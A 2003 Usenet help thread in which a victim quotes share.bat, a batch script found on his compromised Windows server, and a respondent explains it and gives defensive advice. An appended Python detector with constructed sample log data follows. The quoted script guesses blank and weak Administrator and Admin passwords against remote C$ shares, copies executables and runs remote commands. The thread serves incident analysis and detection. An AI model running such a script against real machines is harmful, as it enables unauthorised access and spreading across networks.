Re: Someone hacked one of my servers
From: Karl Levinson [x y] mvp (levinson_k@despammed.com)
Date: 02/17/03
- In reply to: Joe Kinsella: "Someone hacked one of my servers"
From: "Karl Levinson [x y] mvp" <levinson_k@despammed.com> Date: Sun, 16 Feb 2003 19:38:33 -0500
The first few commands are trying to open a C: drive by logging in with the
account Admin or Administrator with some very simple passwords. If one of
these worked, you really really need a better password on all your accounts,
especially administrator... and a firewall that blocks windows networking
[netbios over TCP/IP, e.g. TCP and UDP 135 - 139 and 445] BOTH directions,
not just outbound. The %1 command implies this is a batch file where the
server name or IP address is supplied when the batch file is called, at the
command line or by another batch file, e.g. FILENAME.BAT servername.
If you found this file on your computer, this person probably had already
hacked a way to remotely run commands on your server which may or may not be
related to this batch file. I'm also guessing they used the TFTP.EXE or
FTP.EXE commands to download other files such as iserver.bat and ntadmin.exe
and ntcmd and skill.vxd to your C:\drivers\ folder [which they probably
created as well]. You can see file copies in the second part of this log.
I'm guessing ntcmd.exe in the third part is something like CUSRMGR.EXE from
the Windows Resource Kit. It looks like they attempted to create some
accounts named Admin or Administrator to allow future access. Note that
while these accounts may have been created on your computer, these commands
are probably trying to create the accounts on another computer, maybe on
your network, maybe not. I think you've got some REAL problems. There's no
way to know what else they did to this system.
Frequently this type of hack might come in through IIS web services, so
check your IIS web logs if you have logging enabled. Otherwise, check your
firewall logs [if you had a firewall]. Otherwise, you probably don't have
any other logs that show what happened or who to try to prosecute. If
you're a business, you might try calling the authorities [police or local
FBI office in the US, though don't expect anything to happen unless you're a
business with provable financial loss].
You're doing the right thing in analyzing the system to try to prevent
making the same mistake again. I would seriously think about formatting and
reinstalling everything after your investigation is over.
Firewalls and antivirus can be had for free [example www.sygate.com free
firewall and www.grisoft.com for antivirus]. So there's no excuse.
Here are some things you should do:
http://securityadmin.info/faq.htm#hacked [looking for more clues to how you
were hacked]
http://securityadmin.info/faq.htm#iislogs2
http://securityadmin.info/faq.htm#iislogs
http://securityadmin.info/faq.htm#re-secure
http://securityadmin.info/faq.htm#harden [how to harden your computer
against this]
http://securityadmin.info/faq.htm#firewalls
Hope this helps. Let us know if you find anything interesting or have any
questions.
"Joe Kinsella" <joek@tarragonsoftware.com> wrote in message
news:#szqwCY1CHA.1712@TK2MSFTNGP10...
> After realizing my system was hacked, I took it offline and started to look
> at what happened. I found a script called share.bat that reads as listed
> below. Does anyone have any idea what this might be doing?
>
> net use \\%1\C$ "" "/user:Administrator"
> net use \\%1\C$ "administrator" "/user:Administrator"
> net use \\%1\C$ "admin" "/user:Administrator"
> net use \\%1\C$ "" "/user:Admin"
> net use \\%1\C$ "admin" "/user:Admin"
> net use \\%1\C$ "administrator" "/user:Admin"
> md \\%1\C$\Drivers
> copy iserver.bat \\%1\C$\Drivers
> copy ntadmin.exe \\%1\C$\Drivers
> ntcmd \\%1 -u:Administrator -p: < skill.vxd
> ntcmd \\%1 -u:Administrator -p:administrator < skill.vxd
> ntcmd \\%1 -u:Administrator -p:admin < skill.vxd
> ntcmd \\%1 -u:Admin -p: < skill.vxd
> ntcmd \\%1 -u:Admin -p:admin < skill.vxd
> ntcmd \\%1 -u:Admin -p:administrator < skill.vxd
> net use \\%1\C$ /del
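As an added example (not part of the original thread), a small Python detector for the trail a share.bat-style run leaves in a Windows 2000/2003-era Security log: repeated 529 (bad user name or password) network logons against Administrator or Admin from one source, a 540 network-logon success following them, and a 624 creation of an Admin-style account. The pipe-delimited record layout and the sample records are constructed for this example, not the Event Viewer export format.

```python
"""Flag the logon pattern a share.bat-style run leaves in a Windows 2000/2003
Security log.  Classic event IDs: 529 = bad user name or password,
540 = successful network logon, 624 = user account created."""
from collections import defaultdict
from datetime import datetime, timedelta

# Accounts the batch file guesses against, taken from share.bat.
TARGET_ACCOUNTS = {"administrator", "admin"}
# share.bat fires its guesses within seconds; this many fails in the window is scripted.
BURST_THRESHOLD = 3
BURST_WINDOW = timedelta(seconds=30)

# Constructed sample (field layout is assumed, not the Event Viewer export):
# the third guess for Administrator works, all three for Admin fail, then
# an "Admin" account is created.  The last two records are a user's typo.
SAMPLE_LOG = """\
2003-02-15 22:41:02|529|Administrator|3|10.0.0.77
2003-02-15 22:41:02|529|Administrator|3|10.0.0.77
2003-02-15 22:41:03|540|Administrator|3|10.0.0.77
2003-02-15 22:41:03|529|Admin|3|10.0.0.77
2003-02-15 22:41:04|529|Admin|3|10.0.0.77
2003-02-15 22:41:04|529|Admin|3|10.0.0.77
2003-02-15 22:41:09|624|Admin|3|10.0.0.77
2003-02-15 23:10:44|529|jsmith|2|WKSTN12
2003-02-15 23:10:51|528|jsmith|2|WKSTN12
"""

def parse(text):
    """Yield (timestamp, event_id, account, logon_type, source) per record."""
    for line in text.splitlines():
        ts, eid, acct, ltype, src = line.split("|")
        yield datetime.fromisoformat(ts), int(eid), acct, int(ltype), src

def find_guessing(text):
    """Return (finding, source, account) tuples in log order."""
    failures = defaultdict(list)   # (source, account) -> failure times
    findings = []
    for ts, eid, acct, ltype, src in parse(text):
        key = (src, acct.lower())
        if eid == 529 and ltype == 3 and acct.lower() in TARGET_ACCOUNTS:
            failures[key].append(ts)
            recent = [t for t in failures[key] if ts - t <= BURST_WINDOW]
            if len(recent) == BURST_THRESHOLD:
                findings.append(("guess_burst", src, acct))
        elif eid == 540 and key in failures:
            # A success right after bad guesses means a weak password was found.
            findings.append(("success_after_guesses", src, acct))
        elif eid == 624 and acct.lower() in TARGET_ACCOUNTS:
            findings.append(("admin_account_created", src, acct))
    return findings
```

A source that appears in a guess_burst or success_after_guesses finding is the machine to look for in the firewall and IIS logs the reply mentions.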